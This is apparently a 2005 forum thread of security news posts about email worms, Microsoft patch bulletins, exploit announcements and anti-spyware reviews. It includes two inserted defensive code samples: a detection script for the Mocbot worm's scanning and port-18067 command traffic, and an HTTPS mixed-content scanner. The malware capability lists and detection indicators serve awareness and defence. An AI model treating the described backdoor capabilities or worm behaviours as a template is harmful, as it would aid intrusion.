http://secunia.com/virus_information/21639/bagledl-u/
Bagle.BI — Internet Storm Center article
http://isc.sans.org/diary.php?storyid=682
Attachments arrive as:
09_price.zip
newprice.zip
new_price.zip
price2.zip
price.zip
price_new.zip
-
September 21, 2005 at 7:19 am #3058580
Bagle Virus Spam Attack — 11 new variants in one day
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Earlier this week, the Bagle malware authors used an approach of creating a number of new viruses and spamming them massively in the wild. Each new wave of infected emails contained a different variation of the virus which was designed to elude detection by AV vendors. F-Secure set an all-time record with 11 releases in one day
Excellent Writeup by F-Secure on September 20th
Email-Worm.Win32.Bagle.cy (aka Bagle.BI)
Email-Worm.Win32.Bagle.cz
Email-Worm.Win32.Bagle.da
Email-Worm.Win32.Bagle.db
Email-Worm.Win32.Bagle.dc
Email-Worm.Win32.Bagle.dd
Email-Worm.Win32.Bagle.de
Email-Worm.Win32.Bagle.df
-
September 25, 2005 at 6:40 am #3062071
SANS: Bouncing Malware writeup featuring James Bond theme
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
The folks at the Internet Storm Center have an interesting series that illustrates the dangers of advanced spyware threats. This one is dedicated to the James Bond fans and provides an interesting account of the dangers in using the Internet without proper safeguards or precautions.
-
September 25, 2005 at 6:40 pm #3061997
Opera 8.50 browser – Adbar removed & latest security updates
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Opera 8.50 was recently improved to remove the adbar on the free version. So far the new version is working well and presents no conflicts with IE 6 SP2 or Mozilla Firefox 1.5.
Release Note
This release is a recommended security upgrade.
At a Glance
- Advertisement banner removed
- Registration options removed
- Updated end-user license agreement
- Browser JavaScript fixes broken Web sites on the fly
Changes since 8.02
User interface
- Removed advertising banners and all dialogs and menus related to advertising, registration, and license codes.
- Solved issue with Opera reverting explicit user setting to use program as handler rather than plug-in.
- Removed support for branded banners.
Security
- Fixed issue reported in Secunia Advisory 16645: Attachment URLs now used instead of cache URLs for viewing attachments.
- Fixed drag-and-drop vulnerability allowing unintentional file uploads. Issue reported by mikx.de.
- Improved handling of must-revalidate cache directive for HTTPS pages.
- Fixed display issue with cookie comment encoding.
Miscellaneous
- Included Browser JavaScript by default. On first run after install/upgrade, Opera will fetch a fresh browser.js file and start using it.
- Multiple stability fixes.
Download Link for version 8.50:
-
September 26, 2005 at 2:40 pm #3063342
InfoWorld – Corporate Spyware Product Evaluations
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
F-Secure was the top corporate choice, based on its real-time effectiveness in stopping a broad range of spyware and adware infections.
InfoWorld – Corporate Spyware Product Evaluations
F-Secure selected as top corporate Spyware product overall
QUOTE: F-Secure Anti-Virus Client Security has one of the best, most comprehensive security bundles available, although it suffers a bit from a disjointed administration user interface. One of three anti-spyware solutions in this review that includes anti-virus capabilities in the same package, Anti-Virus Client Security’s real-time protection stopped all attempts to infect my test clients. Reporting is browser-based and provides ample predefined templates. Because of its awesome real-time protection and overall performance, Anti-Virus Client Security 6 received the highest score of the ten products reviewed.
-
September 27, 2005 at 10:40 am #3063001
Suclove.A – New version of LoveLetter virus emerges
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
A new virus resembling the social engineering approach of the Love Letter virus in May 2000 has emerged. This one is easy to block and more of a threat to home users.
McAfee information
http://vil.nai.com/vil/content/v_136187.htm
Trend and Symantec information
http://secunia.com/virus_information/21881/suclove.a/
Payload: Opens a back door that allows a remote attacker to have unauthorized access to the compromised computer.
Large scale e-mailing: Uses MS Outlook to send a copy of the worm to all users in the Outlook address book.
Degrades performance: Creates a mass-mailing of itself, which may impact performance.
Releases confidential info: Attempts to steal confidential system information.
EMAIL TO AVOID
Subject: Love, for Forgiveness :->
Body: I love u please forgive me!…
Attachment: LoveLetter.doc.exe
Subject: Read my letter for you
Body: this was created from the deep inside my heart.
Attachment: LoveLetter.doc.exe
-
September 28, 2005 at 2:40 pm #3061214
Backdoor.Hesive – Zero Day MS Access Jet Engine Exploit
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Please be careful with all email messages containing Microsoft Access attachments. This new exploit capitalizes on an unpatched MS Jet Engine vulnerability that creates a compromise to system security until the Trojan Horse is removed.
While this new zero day attack is very rare, it could surprise individuals if we were massively spammed in the wild, as Microsoft Access database email attachments are usually thought of as being safe to open. Thus we should always be cautious on ANY attachment type, and the best practice is to never open attachments regardless of whether they appear safe or not.
Backdoor.Hesive – Zero Day MS Jet Engine Exploit
http://secunia.com/virus_information/21954/hesive/
Backdoor.Hesive is a Trojan horse that opens a back door on the compromised computer and allows a remote attacker unauthorized access. The Trojan may arrive as a Microsoft Access file that exploits the Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability (described in Bugtraq ID 12960).
Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12960/info
Solution: Currently we are not aware of any vendor-supplied patches for this issue
Allows the remote attacker the ability to perform the following actions:
List active ports
List processes, services, and threads
Download and execute remote files
Upload files
Run a system shell
Modify registry values
End processes
Get system information
Get network information
Post collected data to hostile web site
-
September 29, 2005 at 10:40 am #3061844
Microsoft Office 2003 SP2 released
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Several Microsoft service packs were released for the Office 2003 product family.
Microsoft Office 2003 SP2 Released
http://support.microsoft.com/kb/887616
Security bulletins that are associated with the service pack
MS05-023/KB890169: Vulnerabilities in Microsoft Word could lead to remote code execution
MS04-027/KB884933: Vulnerability in WordPerfect converter could allow code execution
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Visio 2003 SP2 Released
http://support.microsoft.com/kb/887622
Security bulletins that are associated with the service pack
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Outlook 2003 Junk Email Filter Update
http://support.microsoft.com/kb/904631
This update should improve your junk mail filtering accuracy.
-
October 4, 2005 at 9:07 pm #3071407
Spybot.YCL – Attacks 7 major unpatched vulnerabilities or other weak security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new version of Spybot has to be one of the most comprehensive attacks I’ve seen today for this large family of viruses. It attacks weak passwords, uses existing backdoor infections, plus attacks through some of the most prominent security vulnerabilities if a system is unpatched.
Spybot.YCL – Attacks 7 major unpatched vulnerabilities or other weak security vulnerabilities
1. Attacks several major security vulnerabilities in unpatched Microsoft, Dameware, and Veritas software:
- The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (described in Microsoft Security Bulletin MS03-026).
- The Microsoft Windows Local Security Authority Service Remote Buffer Overflow (as described in Microsoft Security Bulletin MS04-011)
- The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039)
- The Microsoft Windows ntdll.dll Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS03-007).
- The Microsoft Windows SSL Library Denial of Service Vulnerability (described in Microsoft Security Bulletin MS04-011).
- The Microsoft Windows ASN.1 Vulnerability (as described in Microsoft Security Bulletin MS04-007).
- The DameWare Mini Remote Control Server Pre-Authentication Buffer Overflow vulnerability (as described in Bugtraq ID 9213).
- The VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability (as described here).
2. Spreads over network shares and Microsoft SQL server using weak usernames and passwords
3. Spreads to compromised computers by using back doors left behind by other malware such as:
- W32.Mydoom@mm
- W32.Beagle@mm
- Backdoor.Netdevil
- Backdoor.Optix
- Backdoor.Subseven
-
October 6, 2005 at 5:11 am #3069443
Sober.R – MEDIUM RISK by McAfee and difficult to remove
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
The Sober virus family is always one to watch. This one is spreading rapidly and McAfee has declared Medium Risk. It is also very difficult to clean until enhanced cleaning capabilities are provided by AV companies.
Sober.R – MEDIUM RISK by McAfee
http://vil.nai.com/vil/content/v_136390.htm
Other AV companies
http://secunia.com/virus_information/22225/sober.s/
EMAIL TO AVOID – English & German variants
Subject: Your new Password
Body: Your password was successfully changed! Please see the attached file for detailed information.
This mass-mailing email virus arrives in an email message with one of the following attachment names: KlassenFoto.zip, pword_change.zip
SPECIAL INSTRUCTIONS FOR INFECTED PCs
Cleaning this new variant is difficult as some new techniques used by the virus writer lock down security of infected files (blocks access to files using special registry settings), so that you have to clean in SAFE MODE until McAfee releases its next DAT file (which will reset file access permissions in the registry to allow direct cleaning).
Quote: Due to the nature in which this virus operates once a machine is successfully infected, read-access to its file may be denied. The AV scanner will not be able to detect the file in this case. Because of this, if a machine is suspected to be infected, users are recommended to follow the procedure below:
Reboot the system into Safe Mode (hit the F8 key as soon as the Starting Windows text is displayed) and choose Safe Mode.
Run a system scan using the specified engine/DATs.
Delete files flagged as infected.
Restart machine in default mode.
-
October 7, 2005 at 9:07 am #3069966
Windows Vista – Review of Beta 1 by Tech Republic
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
The following 3-part review was featured by Tech Republic on the enhancements that will be forthcoming in Windows Vista, which is Microsoft’s next generation operating system for client workstations.
http://www.winsupersite.com/reviews/winvista_beta1_01.asp
-
October 9, 2005 at 5:10 am #3070230
Common Malware Enumeration – New CME standard for AV vendors
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
CERT provides one of the best websites related to computer security. They have recently addressed a major issue among anti-virus companies, where common naming conventions don’t exist due to the competitive nature of being first many times. Also, some AV products can handle several variants with a single definition, where other AV vendors must specifically define a new variant each time a new compression or packing technique is used on the executable.
Chris Mosby, a very talented security moderator in My IT Forums, commented on this need in an “Open Letter to Anti-Virus Software Companies” in November 2004. This new system won’t be perfect, but it’s a step in the right direction. It’ll help companies like the one I work for, which uses corporate McAfee VS 8.0i on the desktop and SAV for email filtering.
Common Malware Enumeration (CME) – Home Page
http://cme.mitre.org/
Common Malware Enumeration (CME) – FAQ
http://cme.mitre.org/about/faqs.html
Common Malware Enumeration (CME) – Current List
http://cme.mitre.org/data/list.html
Common Malware Enumeration (CME) – How it Works
http://cme.mitre.org/cme/process.html
Common Malware Enumeration (CME) – Press Release
http://cme.mitre.org/about/docs.html
-
October 10, 2005 at 1:11 pm #3060270
Zafi.F – Appears to be legitimate MSN email
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Zafi.F is spreading via email in English, Italian, Spanish, Russian, Swedish and several other languages. This new HTML based variant is authentic in appearance, from a social engineering perspective.
SECUNIA
http://secunia.com/virus_information/22349/zafi.f/
F-SECURE
http://www.f-secure.com/v-descs/zafi_f.shtml
McAfee
http://vil.nai.com/vil/content/v_136426.htm
DO NOT OPEN ATTACHMENTS ENDING WITH: pif, cmd, bat, com or zip.
-
October 11, 2005 at 7:31 pm #3069067
Microsoft Security Bulletins – October 2005
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
-
October 12, 2005 at 5:30 pm #3060038
October Microsoft Security Bulletins – more in-depth information
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft Security Release – October 2005
The following provides an overview of several important updates.
Microsoft Security Release – October 2005
http://www.microsoft.com/technet/security/Bulletin/ms05-Oct.mspx
Internet Storm Center – Excellent Technical Analysis
http://isc.sans.org/diary.php?date=2005-10-11
Vulnerability in DirectShow Could Allow Remote Code Execution (904706) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-050.mspx
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-051.mspx
Cumulative Security Update for Internet Explorer (896688) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-052.mspx
Vulnerability in the Client Services for Netware Could Allow Remote Code Execution (899589) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-046.mspx
Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-047.mspx
Vulnerability in the Microsoft Collaboration Objects Could Allow Remote Code Execution (907245) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-048.mspx
Vulnerabilities in Windows Shell Could Allow Remote Code Execution (900725) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-049.mspx
Vulnerability in the Windows FTP Client Could Allow File Transfer Location and Tampering (905495) – Moderate
http://www.microsoft.com/technet/security/Bulletin/ms05-044.mspx
Vulnerability in Network Connection Manager Could Allow Denial of Service (905414) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-045.mspx
-
October 17, 2005 at 1:47 pm #3057965
Microsoft Technet Security: New Learning Paths training Facility
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft’s Technet Security team is introducing a new Learning Paths website that features resources on security threats and appropriate controls. Each month new articles and training materials will be featured to provide on-going training for security professionals.
http://www.microsoft.com/technet/security/learning/default.mspx
Featured This Month:
Internal Threats: Mitigate the Risks in Your Environment
Today’s IT Professionals work in a challenging environment where there’s a constant effort to protect resources and vital information from internal misuse. Attend this series and learn about the risks, business challenges and recommendations for protecting your network from internal threats. We will cover topics such as security risk management, assessment, and implementation, as well as steps for meeting your business needs of operating in a more secure environment.
-
October 17, 2005 at 5:47 pm #3057890
PC World – Evaluation of 11 Anti-Spyware Products
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
In the November 2005 issue of PC World magazine, 11 different products are evaluated. Webroot Spysweeper continues to score near the top in all evaluations. The MSAS beta release also had a positive review and scored as one of the best free products. It’s always best to look at more than one evaluation, as the review team can rank categories differently.
-
October 20, 2005 at 6:38 am #3044714
Microsoft October Security Bulletins – Exploits in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
So far, there are no published reports for MS05-051 which some security firms feel has the potential to be crafted into a possible Internet worm, that could especially impact Windows 2000 based PCs and Servers. At least 3 proof-of-concept exploits were developed within a couple of days of the October 11th updates, so companies should carefully test their applications and patch expediently. All users should stay as up-to-date as possible on any security patches that are released.
» 2005-10-13 : Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
» 2005-10-13 : Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
» 2005-10-13 : Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
-
October 20, 2005 at 6:38 am #3044712
Netscape 8.04 released to address critical security issues
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
All Netscape 8.0x users should update to the latest version to stay protected, as recent improvements in security have been released.
http://browser.netscape.com/ns8/security/alerts.jsp
Fixed in Netscape Browser 8.0.4
• MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability Fixes
• MFSA 2005-57 IDN heap overrun using soft-hyphens
-
October 20, 2005 at 6:38 am #3044713
Oracle RDBMS – Critical security patches released in October
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
During October, Oracle released several critical security patches that companies should quickly test and apply to safeguard information in these database repositories.
2005-10-19 : Oracle Products Buffer Overflow and SQL Injection Vulnerabilities
Multiple vulnerabilities were identified in various Oracle products, which may be exploited by remote or local attackers to cause a denial of service, execute arbitrary commands, conduct SQL injection attacks and cross site scripting attacks, or bypass certain security restrictions. These flaws are due to unspecified errors in Oracle Database Server, Application Server, Collaboration Suite, E-Business Suite, Applications, Enterprise Manager, PeopleSoft Enterprise, and JD Edwards EnterpriseOne. No further details have been disclosed.
-
October 23, 2005 at 6:36 am #3045113
MS05-047 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
A new attack based on October’s security bulletin MS05-047 surfaced overnight. This new threat remains at low risk currently.
MS05-047 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htm
This botnet client was spread using the MS05-047 vulnerability in October 2005. This threat appears to be the first of its kind to exploit the recent MS05-047 Microsoft Windows vulnerability.
This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbios and microsoft-ds network traffic
2. Presence of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites
-
October 25, 2005 at 2:42 am #3043463
MS05-037 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
A new attack based on August’s security bulletin MS05-039 surfaced overnight. This new threat remains at low risk currently. This was initially reported as an MS05-047 exploit, but after further analysis McAfee has confirmed that while MS05-047 code was present, the MS05-039 exploit was used as the key method to infect unpatched PCs.
MS05-039 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htm
This botnet client was spread using the MS05-039 vulnerability in October 2005. This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbios and microsoft-ds network traffic
2. Presence of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites
— AVERT / McAfee Update Oct 23, 2005 — After further analysis, AVERT has confirmed that this threat does not exploit MS05-047, but rather MS05-039. Initial analysis suggested the MS05-047 was being exploited due to similarities between those exploits (including overlapping code between publicly available source code), field infection reports where administrators incorrectly stated that machines were patched from MS05-039, and similarities between an earlier MS05-039 exploiting bot, where the only significant change was the exploit code being used.
Additionally, AVERT has confirmed that automated propagation has/had been configured on remote IRC servers, such that infected systems that are able to connect to the remote IRC server are immediately instructed to seek out vulnerable systems to infect them. This threat exploits the MS05-039 Microsoft Windows vulnerability.
-
October 25, 2005 at 6:36 am #3046387
MS05-047: Two new exploits developed from MS October security bulletins
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Two more new exploits have developed as malicious individuals work to reverse engineer the changes and discover code weaknesses in unpatched systems. These new potential attacks are based on the MS05-047 Microsoft Security Bulletin issued in October. It’s always a best practice to patch as soon as Microsoft performs a release which is usually the second Tuesday of each month.
2005-10-24 : Microsoft Windows Plug and Play “Umpnpmgr.dll” DoS Exploit (MS05-047)
2005-10-21 : Microsoft Windows Plug and Play “Umpnpmgr.dll” Remote Exploit (MS05-047)
-
October 26, 2005 at 10:36 am #3045556
MS05-039 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
A new attack based on August’s security bulletin MS05-039 surfaced overnight. This new threat remains at low risk currently. This was initially reported as an MS05-047 exploit, but after further analysis McAfee has confirmed that while MS05-047 code was present, the MS05-039 exploit was used as the key method to infect unpatched PCs.
MS05-039 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htm
This botnet client was spread using the MS05-039 vulnerability in October 2005. This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbios and microsoft-ds network traffic
2. Presence of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites
— AVERT / McAfee Update Oct 23, 2005 — After further analysis, AVERT has confirmed that this threat does not exploit MS05-047, but rather MS05-039. Initial analysis suggested the MS05-047 was being exploited due to similarities between those exploits (including overlapping code between publicly available source code), field infection reports where administrators incorrectly stated that machines were patched from MS05-039, and similarities between an earlier MS05-039 exploiting bot, where the only significant change was the exploit code being used.
Additionally, AVERT has confirmed that automated propagation has/had been configured on remote IRC servers, such that infected systems that are able to connect to the remote IRC server are immediately instructed to seek out vulnerable systems to infect them. This threat exploits the MS05-039 Microsoft Windows vulnerability.
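The three Mocbot symptoms listed in these write-ups (SYN sweeps of TCP 139/445 across a class A range, the wudpcom service and binary, and outbound TCP 18067) translate directly into detection logic. The following is an added example, not code from the posts or from McAfee; the flow-log format, the sample lines and the service table are constructed, and the scan threshold is an assumed tuning value.

```python
"""Flag hosts showing the Mocbot symptoms described above.
The flow-log format and all sample data are constructed for this example."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

SCAN_PORTS = {139, 445}   # netbios-ssn and microsoft-ds, per the write-up
C2_PORT = 18067           # outbound connections named as symptom 3
SCAN_THRESHOLD = 20       # assumed: distinct 139/445 targets before a host is flagged


@dataclass(frozen=True)
class Conn:
    src: str
    dst: str
    dport: int
    flags: str


def parse_line(line: str) -> Conn:
    """Parse one constructed flow line, e.g.
    '2005-10-23 03:12:01 TCP 10.1.2.3:1043 -> 10.7.8.9:445 S'."""
    parts = line.split()
    # parts: date, time, proto, src:port, '->', dst:port, tcp flags
    if len(parts) != 7 or parts[2] != "TCP" or parts[4] != "->":
        raise ValueError(f"unrecognised flow line: {line!r}")
    src, _ = parts[3].rsplit(":", 1)
    dst, dport = parts[5].rsplit(":", 1)
    return Conn(src=src, dst=dst, dport=int(dport), flags=parts[6])


def analyse(lines: Iterable[str]) -> Dict[str, Dict[str, object]]:
    """Return per-source findings for hosts that sweep 139/445 or talk to 18067."""
    targets: Dict[str, Set[str]] = defaultdict(set)   # src -> distinct 139/445 dsts
    c2: Dict[str, Set[str]] = defaultdict(set)        # src -> 18067 peers
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        c = parse_line(line)
        if c.dport in SCAN_PORTS and "S" in c.flags:   # SYN toward a share port
            targets[c.src].add(c.dst)
        if c.dport == C2_PORT:
            c2[c.src].add(c.dst)
    findings: Dict[str, Dict[str, object]] = {}
    for host in sorted(set(targets) | set(c2)):
        n = len(targets.get(host, ()))
        reasons: List[str] = []
        if n >= SCAN_THRESHOLD:   # a real client talks to a few servers, not dozens
            reasons.append(f"SYN to {n} distinct hosts on TCP 139/445")
        if host in c2:
            reasons.append(f"outbound TCP {C2_PORT} to {sorted(c2[host])}")
        if reasons:
            findings[host] = {"scan_targets": n,
                              "c2_peers": sorted(c2.get(host, ())),
                              "reasons": reasons}
    return findings


def host_indicators(services: Dict[str, str]) -> List[str]:
    """Symptom 2: a service named 'wudpcom' or any service whose binary is
    wudpcom.exe. `services` maps service name -> image path (constructed input;
    on a real host it would be read from the service control manager)."""
    hits = []
    for name, path in services.items():
        normalised = path.lower().replace("/", "\\")
        if name.lower() == "wudpcom" or normalised.endswith("\\wudpcom.exe"):
            hits.append(f"{name} -> {path}")
    return hits


def _constructed_sample_log() -> List[str]:
    lines = ["# constructed sample, not a real capture"]
    # benign client repeatedly reaching its own file server on 445
    for i in range(5):
        lines.append(f"2005-10-23 03:10:0{i} TCP 10.1.2.50:10{i}0 -> 10.1.2.10:445 S")
    # infected host sweeping the class A range, alternating 139 and 445
    for i in range(30):
        port = 445 if i % 2 else 139
        lines.append(f"2005-10-23 03:12:{i:02d} TCP 10.1.2.3:{1024 + i} -> 10.{i}.0.{i + 1}:{port} S")
    # the same host checking in to its controller on 18067 (address is a documentation range)
    lines.append("2005-10-23 03:13:00 TCP 10.1.2.3:1100 -> 192.0.2.44:18067 S")
    return lines


SAMPLE_LOG = _constructed_sample_log()
SAMPLE_SERVICES = {"Spooler": r"C:\WINDOWS\system32\spoolsv.exe",
                   "wudpcom": r"C:\WINDOWS\system32\wudpcom.exe"}

if __name__ == "__main__":
    for host, info in analyse(SAMPLE_LOG).items():
        print(host, info["reasons"])
    print(host_indicators(SAMPLE_SERVICES))
```

Only the sweeping host is reported; the benign client that hits one file server many times stays below the threshold because the logic counts distinct targets, not connections.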
-
October 26, 2005 at 10:36 am #3045557
Windows XP Security Guide – New 2.1 version released
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft has just updated the Windows XP security guide and this free resource can be found through the following link:
Any IT environment is only as secure as its weakest link. Unfortunately, client operating systems are often overlooked during security projects. As your organization plans to implement Microsoft® Windows® XP Professional with Service Pack 2 (SP2), ensure that security is an integral part of your deployment plans.
Although the default installation of Windows XP is quite secure, it is important to remember the trade-offs that exist between security, usability, and functionality of the client computers in your environment. A thorough understanding of these trade-offs places your organization in a position to maximize the security of your Windows XP deployment.
The guide provides specific recommendations about how to harden computers that run Windows XP with SP2 in three distinct environments:
• Enterprise Client (EC). Client computers in this environment are located in an Active Directory® directory service domain and only need to communicate with systems that run Windows 2000 or later versions of the Windows operating system.
• Stand-Alone (SA). Client computers in this environment are not members of an Active Directory domain and may need to communicate with systems that run Windows NT® 4.0.
• Specialized Security – Limited Functionality (SSLF). Concern for security in this environment is so great that a significant loss of functionality and manageability is acceptable. For example, military and intelligence agency computers operate in this type of environment.
-
October 26, 2005 at 4:19 pm #3045453
Virkel.A – New sophisticated Instant Messaging virus
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
This new Instant Messenger (IM) threat should be closely watched as it contains a security backdoor and other sophisticated capabilities.
http://secunia.com/virus_information/22890/virkel.a/
Virkel is a backdoor with IM (Instant Messenger) spreading capabilities. It was first found on October 26th, 2005. The backdoor can provide a hacker with information about a system, work as a proxy, update itself, perform a Denial of Service (DoS) attack, open remote shell, download files. It also kills processes of anti-virus and security software and blocks access to many different sites that belong to anti-virus and security software vendors.
-
October 30, 2005 at 3:15 am #3115154
Microsoft documents security improvements planned for IE 7
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
As noted in this Tech Republic Article, Internet Explorer version 7 will support a more robust protocol for encrypting user data and securing online transactions.
http://blogs.msdn.com/ie/archive/2005/10/22/483795.aspx
QUOTE: In a posting on the Microsoft Internet Explorer blog, IE program manager Eric Lawrence said that IE7 would support the Transport Layer Security (TLS) protocol by default.
Lawrence also explained how IE7 will behave differently from earlier versions when it encounters potential security problems.
“Whenever IE6 encountered a problem with a HTTPS-delivered Web page, the user was informed via a modal dialog box and was asked to make a security decision. IE7 follows the XPSP2 ‘secure by default’ paradigm by defaulting to the secure behavior,” said Lawrence.
IE7 will not give users the option of seeing both secure and insecure items within an HTTPS page. With IE6, this option appears when the browser encounters an HTTPS page that includes some HTTP content. But in IE7, only the secure content will be rendered by default, forcing the user to choose to access the rest via the information bar.
“This is an important change because very few users (or web developers) fully understand the security risks of rendering HTTP-delivered content within a HTTPS page,” Lawrence claimed.
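The risk Lawrence describes is HTTP-delivered sub-resources inside an HTTPS page, which IE7 stops rendering by default. The following is an added example, not code from the post or from Microsoft: a small audit that finds such references in a page's HTML so a site owner can fix them before the browser blocks them. The sample page and host names are constructed.

```python
"""Find HTTP-delivered sub-resources referenced from an HTTPS page.
The HTML sample and host names are constructed for this example."""
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urljoin, urlsplit

# element -> attribute that names a resource the browser will fetch or submit to
RESOURCE_ATTRS = {"script": "src", "img": "src", "iframe": "src", "embed": "src",
                  "object": "data", "link": "href", "form": "action"}
# content that can change or read the page (or carry form data) is the serious case;
# images are the classic "passive" mixed content that IE6 merely warned about
ACTIVE = {"script", "iframe", "embed", "object", "link", "form"}


class MixedContentScanner(HTMLParser):
    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.findings: List[Tuple[str, str, str]] = []   # (tag, resolved url, severity)

    def handle_starttag(self, tag, attrs):
        attr = RESOURCE_ATTRS.get(tag)
        if attr is None:
            return
        a = dict(attrs)
        value = a.get(attr)
        if not value:
            return
        # only stylesheet links are fetched as part of rendering; skip rel=canonical etc.
        if tag == "link" and (a.get("rel") or "").lower() != "stylesheet":
            return
        # relative and scheme-relative ("//host/x") URLs inherit https and are fine
        resolved = urljoin(self.page_url, value.strip())
        if urlsplit(resolved).scheme == "http":
            severity = "active" if tag in ACTIVE else "passive"
            self.findings.append((tag, resolved, severity))


def find_mixed_content(page_url: str, html: str) -> List[Tuple[str, str, str]]:
    """Return (tag, url, severity) for every http:// resource on an https:// page."""
    if urlsplit(page_url).scheme != "https":
        return []   # mixed content only exists when the page itself is HTTPS
    scanner = MixedContentScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# constructed page: one clean script, one scheme-relative script, one relative image,
# plus three HTTP references that IE7 would refuse to render by default
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="http://cdn.example/site.css">
<script src="https://secure.example/app.js"></script>
<script src="//static.example/tracker.js"></script>
</head><body>
<img src="http://images.example/logo.gif">
<img src="/images/ok.png">
<form action="http://forms.example/submit"><input name="q"></form>
</body></html>"""

if __name__ == "__main__":
    for tag, url, severity in find_mixed_content("https://secure.example/account", SAMPLE_PAGE):
        print(f"{severity:7} <{tag}> {url}")
```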
-
October 30, 2005 at 7:15 am #3115124
Article: Oracle password system comes under fire
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Data base Administrators should watch for further developments as this weakness will most likely be corrected in the future.
Article: Oracle password system comes under fire
QUOTE: Attackers could easily uncover Oracle database users’ passwords because of a weak protection mechanism, putting corporate data at risk of exposure, experts have warned.
The technique Oracle uses to store and encrypt user passwords doesn’t provide sufficient security, said Joshua Wright of the SANS Institute and Carlos Sid of Royal Holloway college, University of London.
-
October 31, 2005 at 10:33 am #3114411
New AIM worm carries Windows Rootkit
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
